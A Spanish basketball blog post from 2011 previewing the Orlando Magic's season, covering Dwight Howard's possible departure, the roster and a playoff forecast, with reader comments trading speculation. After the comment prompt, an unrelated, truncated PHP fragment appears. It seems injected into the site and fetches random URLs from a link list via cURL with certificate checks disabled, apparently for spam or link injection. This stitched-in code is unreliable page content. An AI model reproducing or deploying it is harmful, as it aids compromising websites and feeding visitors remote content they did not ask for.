Orlando Magic: Supermán se queda… de momento

28 de December de 2011 por Love Denise

Ha sido uno de los culebrones de la mini-pretemporada. ¿Seguiría Dwight Howard en Orlando o se marcharía en busca del anillo a otro proyecto más ilusionante que el que presenta en estos momentos los Magic? Desde la humillante eliminación la temporada pasada en primera ronda a manos de los Hawks, “Superman” tomó una decisión y sus intenciones de abandonar Florida eran más que evidentes. Al acabar el lock-out, y por si alguien aún le quedaban dudas de su decisión, habló y no pudo ser mas explícito: pidió al equipo que le dejasen negociar con otros conjuntos. Orlando accedió.

Howard ya no confiaba en este proyecto, y es que los continuos y encadenados errores del General Manager habían convertido a una de las mejores y profundas plantillas de los últimos años en un equipo descompensado, con problemas de banquillo, sin fe en el cuerpo técnico y donde cada uno iba a su aire. El primer grave error fue el intercambiar a Rashard Lewis por Gilbert Arenas. Deportivamente no hay mucho que objetar, ya que el rendimiento deportivo de ambos era similar, pero economicamente Washington salió favorecido de ese trade ya que al bueno de Rashard le quedaban por cobrar unos 20 millones de dólares menos que al Agente Zero.

El segundo grave error fue el adquirir nuevamente a Hedo Turkoglu asumiendo el megacontrato que había firmado en Toronto. El turco aún es capaz de ofrecer su calidad y desequilibrar algún que otro partido, pero a nivel general su rendimiento no es acorde a su salario y su nivel dista un mundo del que ofreciese la última temporada que estuvo en Orlando en su primera etapa.

El tercer grave error llegó tras acabar el lock-out. Gilbert Arenas se convirtió en el primer jugador de la historia en ser amnistiado. Cierto es que sus números eran mediocres para un jugador de su calidad individual (8 ptos, 2.4 rebotes y 3.2 asistencias en 22 minutos), pero quizás hubiera sido mejor haberlo exprimido en la cancha y que los más de 60 millones de dólares que cobrará en los próximos tres años los hubiera ganado dejándose el sudor con la camiseta de los Magic (o de cualquier otro equipo vía traspaso) y no por estar en casa sin hacer nada como finalmente ha sucedido.

Con este panorama, dos eran los equipos que se iban a pelear por los servicios de Superman: Lakers y Nets. Los angelinos, tras su fracasado intento de fichaje de Chris Paul, acabaron declinando al embarcarse en otra operación a gran escala, y a buen seguro intentarán tener más suerte el próximo verano cuando Howard quede libre. En cambio, los Nets desestimaron su fichaje una vez que su principal moneda de cambio, Brook López, cayó lesionado. Por tanto, todo indica que Dwight Howard se comerá el turrón en Florida, aunque no habría que descartar un trade a mitad de temporada. Lo que es casi seguro, es que esta será su última temporada en Orlando.

En lo que se refiere al equipo, éste volverá a estar comandado desde el banco por Stan Van Gundy. El “bigotes” cumplirá su quinta temporada dirigiendo a los de Florida, a pesar de que la eliminación en primera ronda del año pasado dejó su imagen tocada. Los “afortunados” jugadores en escuchar la voz desgañitada de Stan y sus instrucciones serán los siguientes:

El base titular volverá a ser Jameer Nelson. Buen anotador y decente pasador, el “14” apenas tendrá competencia en su puesto, ya que el otro base, Chris Duhon parece perdido para la causa, firmando la temporada pasada una decepcionante campaña.

En las alas, los Magic cuentan con una batería de tiradores que rompen cualquier partido cuando tienen el día bueno pero que te echan a perder el encuentro cuando no se encuentran finos desde la larga y media distancia. El más fiable y regular de ellos es Jason Richardson, siempre productivo, y que afortunadamente para Orlando ha acabado renovando por unos 6 millones de dólares por temporada. Hedo Turkoglu, el cual jugará minutos tanto de “3” como de “4”, es el termometro del equipo. Si recupera el nivel, los Magic podrían hacer algo ilusionante en esta campaña. Si es el jugador apático, y no resolutivo de los últimos tiempos, los Magic pelearán por las plazas intermedias de Playoffs. JJ Redick es la tercera gran arma desde las alas. El año pasado estrenaba contrato (6 millones de dolares) y su temporada no fue la que se esperaba de él, demasiados altibajos para el ex de Duke. Y de Quentin Richardson no hay mucho que hablar. Su temporada fue simplemente lamentable.

A éstos cuatro nombres, hay que sumar otras tres incorporaciones, dos de ellas desde el mercado de agentes libres. La primera de ellas es la de Larry Hughes, otrora escudero de Lebron James y del cual, ya no nos acordamos del último partido bueno que hizo como profesional. Toda una incógnita. La segunda incorporación es la de Von Wafer, el tipico “microondas” que puede venir bien para ciertas fases de un partido, pero sólo eso. Por último, completa el perimetro el rookie DeAndre Liggins, número 53 del último draft y cuya presencia se presupone testimonial.

En la pintura no hace falta decir que cuentan con el mejor pivot de la NBA. Dwight Howard volverá a liderar al equipo tanto en defensa como en ataque a base de dobles-dobles a mansalva e intimadación. Estará acompañado por la gran novedad el equipo, Glen Davis, un buen refuerzo para los Magic. Procedente de los Celtics a cambio de Brandon Bass, “Baby Shaq” jugará algunos minutos al lado de Superman y le suplirá con su calidad y físico en los obligatorios 12 minutos de descanso. La pintura la completan Ryan Anderson, excelente tirador exterior y cuyo rol en el equipo debería crecer, Justin Harper, ala-pivot número 32 del último draft y que también es capaz de tirar desde afuera, Earl Clark, un buen jugador defensivo e interesante para completar la plantilla, y por último Daniel Orton, el cual en condiciones normales, será un fijo en la lista de inactivos.

Quinteto: Jameer Nelson, Jason Richardson, Hedo Turkoglu, Ryan Anderson y Dwight Howard
Sexto hombre: JJ Redick / Glen Davis

Pronóstico: Clasificados para playoffs y eliminados en Primera Ronda.

Comenta

14 comentarios a esta entrada

  1. GreenPride dice:
    #1

    Equipo venido a menos y que se se prepara para el cataclismo de perder a Howard a cambio de nada este próximo verano. Un equipo que parecía cerca del cielo hace dos temporadas se deshace a hora sin que parezca haber remedio posible. Este año todos han estado pendientes de si se iba Howard más que de intentar reforzar el equipo y que se quede. Como unico fichaje con algo de importancia el cambio Bass-Big Baby que les da en algunas cosas y les quita en otras pero que desde luego no parece que les de un salto de calidad que necesitarían.
    Jugadores poco fiables en el día a día como Turkoglu o Reddick harán que Howard acabe deseando que acabe el año para irse y ahí a ver qué decide. Si son los Nets no sé muy bien qué ve en ellos, supongo que formar pareja con Deron y esperara que puedan hacerse con alguien más aprovechando la pasta rusa y el traslado a Brooklyn. No parece que eso le lleve a un posible campeón, al menos de momento. Si elige Lakers, estaría dando una opción a los de LA de tener un par de años optando al título cambiando a Gasol o Bynum por otras piezas que les hicieran más falta pero estaría yendo a un equipo muy envejecido y con no demasiado futuro ya que a Kobe y Pau no parecen quedarles ya demasiados años en la élite. El mismo caso si elige Dallas con Nowitzki y Kidd. Si lo que busca son títulos (varios) a medio plazo debería ir a equipos más jóvenes que puedan durar más como Thunder, Bulls, Pacers (estos además con mucho espacio salarial) aunque por el tema de los mercados seguro que acaba en Nets o Lakers.

      Citar

  2. Viva_Dirk dice:
    #2

    Es uno de los equipos que menos expectativas despierta, ya que no hay nada nuevo que ver en ellos y Howard parece totalmente desmotivado.

    El análisis me parece acertadísimo, y creo que harían bien en sacar algo por Howard, pongo algunos ejemplos que me plantearía siendo GM de Orlando.

    Howard por Hibbert+Granger

    Howard por Ibaka+Harden+Maynor+Aldrich+expirings

    Howard por Kanter+Favors+Harris

      Citar

  3. HisRoyalAirness dice:
    #3

    Si Dwight fuese medianamente listo pedirIa un traspaso con Bulls, lo mismo que deberIa hacer Pau. Además en la conferencia Este no tiene a nadie que pueda defenderle medianamente bien en PO (quizàs Chandler) pero en la Oeste hay varios

      Citar

  4. Kantonyo dice:
    #4

    Los aficionados de Magic deberíais confiar mas en Daniel Orton, es uno de los Center con mas futuro de los últimos años, con unas cualidades físicas envidiables, pero las lesiones le están dejando en el dique seco…

    Por otra parte creo que Ryan Anderson es otro de los tapados en esta plantilla, por lo demás un gran análisis de Denise, como no podía ser de otra forma siendo un análisis de Orlando Magic.

      Citar

  5. Kantonyo dice:
    #5

    Segun Hoopshype, Atlanta y Orlando podrían estar negociando un traspaso entre Dwight Howard por la pareja Josh Smith y Joe Johnson, aunque a mi no me cuadran los salarios, algo tendrán que incluir por parte de Magic. Recordar que Dwight nació en Atlanta, por lo que no es tan raro ese interés…

    Y tambien otro rumor vuelve a llevar a Pau Gasol a Houston, en un triple traspaso. Howard a Lakers, Bynum-Scola-KevinMartin a Orlando y Pau a Houston. Yo creo que sería la peor solución para el español, Houston sin Scola sería una castaña.

      Citar

  6. Denise dice:
    #6

    Kantonyo:
    Los aficionados de Magic deberíais confiar mas en Daniel Orton, es uno de los Center con mas futuro de los últimos años, con unas cualidades físicas envidiables, pero las lesiones le están dejando en el dique seco…

    Ufff ¿tan bueno crees que es Daniel Orton? Yo simplemente es que nunca lo he visto, el año pasado jugó cero minutos. Y este año con Glen Davis tiene hasta más competencia.

      Citar

  7. Viva_Dirk dice:
    #7

    Joder, Bynum+Scola+Kevin Martin es un pasote, no creo que Lakers cerrase ese traspaso, exigirian a Nelson en el traspaso y entonces si sería algo planteable aunque como seguidor amarillo seguiría sin convencerme.

    @HisRoyal: Sería relativamente facil para Howard pedir el traspaso a los Bulls, pero ¿estarian interesados los Bulls en cambiar a Noah+Deng por Howard? Deberia ir acompañado de Richardson o Redick seguramente. Y con Pau lo mismo, los Lakers pedirian seguro Boozer+Deng como mínimo.

      Citar

  8. Denise dice:
    #8

    Viva_Dirk:
    Es uno de los equipos que menos expectativas despierta, ya que no hay nada nuevo que ver en ellos y Howard parece totalmente desmotivado.

    El análisis me parece acertadísimo, y creo que harían bien en sacar algo por Howard, pongo algunos ejemplos que me plantearía siendo GM de Orlando.

    Howard por Hibbert+Granger

    Howard por Ibaka+Harden+Maynor+Aldrich+expirings

    Howard por Kanter+Favors+Harris

    Si, por Howard hay que sacar algo, si no el año que viene te comes los mocos, por eso puse el titular de “..de momento” porque a dia de hoy apostaria mi fortuna a que Howard no acaba la temporada. El GM sería tonto si no lo traspasase.

    Pero tus trades no me convencen mucho, Demasiada gente joven.
    Yo creo que a Howard hay que cambiarlo por otra estrella.
    Lo que mas me gustaria seria Gasol-Bynum (metiendo a Turkoglu en el paquete),

    Otras opciones que me gustarian

    Gay-Marc (con Turkoglu en el paquete)
    Batum-Aldridge
    David Lee-Stephen Curry

      Citar

  9. Denise dice:
    #9

    Kantonyo:
    Bynum-Scola-Kevin Martin a Orlando

    ufff, ese tambien me gusta….donde hay que firmar

      Citar

  10. Denise dice:
    #10

    Kantonyo:
    Segun Hoopshype, Atlanta y Orlando podrían estar negociando un traspaso entre Dwight Howard por la pareja Josh Smith y Joe Johnson, aunque a mi no me cuadran los salarios, algo tendrán que incluir por parte de Magic. Recordar que Dwight nació en Atlanta, por lo que no es tan raro ese interés…

    Joe Johnson?? Otro contratito a los Lewis y a lo Arenas?? Para amnistiarlo el año que viene??
    Espero que sea una inocentada de hoopshype

      Citar

  11. Viva_Dirk dice:
    #11

    No creo que vaya a ser facil recibir dos All-Stars por Howard, que uno de ellos sea interior y que no llegue ningun mal contrato. Lo normal es que busquen contratos bajos/medios acompañados de algun buen jugador, pero el equipo que quiera a Howard para intentar ganar el anillo no puede soltar mucho presente por el.

      Citar

  12. melo15 dice:
    #12

    Yo no se que opinar sobre este tema, comparas la plantilla de hace dos años con la de esta y te caes del susto, yo si fuera howard me pegaria con el GM, como alguien lo puede hacer tan mal!!!!
    Ahora no se donde ira howard, yo no creo que atlanta sea el sitio adecuado, porque el unico jugador que vale la pena es horfors que es pivot, no me gusta nada smith, porque se enamora del tiro exteriro y la caga, dudo que howard se vaya a los jazz, y si yo fuera el GM de los thunder no ficharia a howard ni de coña, porqur los equipos se hacen, primero contruyendo una buena base,(ya la tienen) y despues canviando algunas piezas de menor importancia.

      Citar

  13. melo15 dice:
    #13

    Yo no se que opinar sobre este tema, comparas la plantilla de hace dos años con la de esta y te caes del susto, yo si fuera howard me pegaria con el GM, como alguien lo puede hacer tan mal!!!!
    Ahora no se donde ira howard, yo no creo que atlanta sea el sitio adecuado, porque el unico jugador que vale la pena es horfors que es pivot, no me gusta nada smith, porque se enamora del tiro exteriro y la caga, dudo que howard se vaya a los jazz, y si yo fuera el GM de los thunder no ficharia a howard ni de coña, porqur los equipos se hacen, primero contruyendo una buena base,(ya la tienen) y despues canviando algunas piezas de menor importancia.
    Cuando saldra el analisis de los knicks, porque si queresi lo puedo hacer yo, os juro que no pondre ninguna tonteria en plan melo es el mejor, sere totalmente objetivo o subjetivo no me acuerdo como se dice, y pondre signos de puntuacion y esas cosas.

      Citar

  14. Denise dice:
    #14

    melo15:
    os juro que no pondre ninguna tonteria en plan melo es el mejor, sere totalmente objetivo o subjetivo no me acuerdo como se dice, y pondre signos de puntuacion y esas cosas.

    JAJAJA Melo15, a diferencia de Carmelo Anthony, tu si que eres un crack,,,, tu dicotomía entre objetivo/subjetivo ha sido un puntazo. Me parto de reir con tus pensamientos. En serio.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>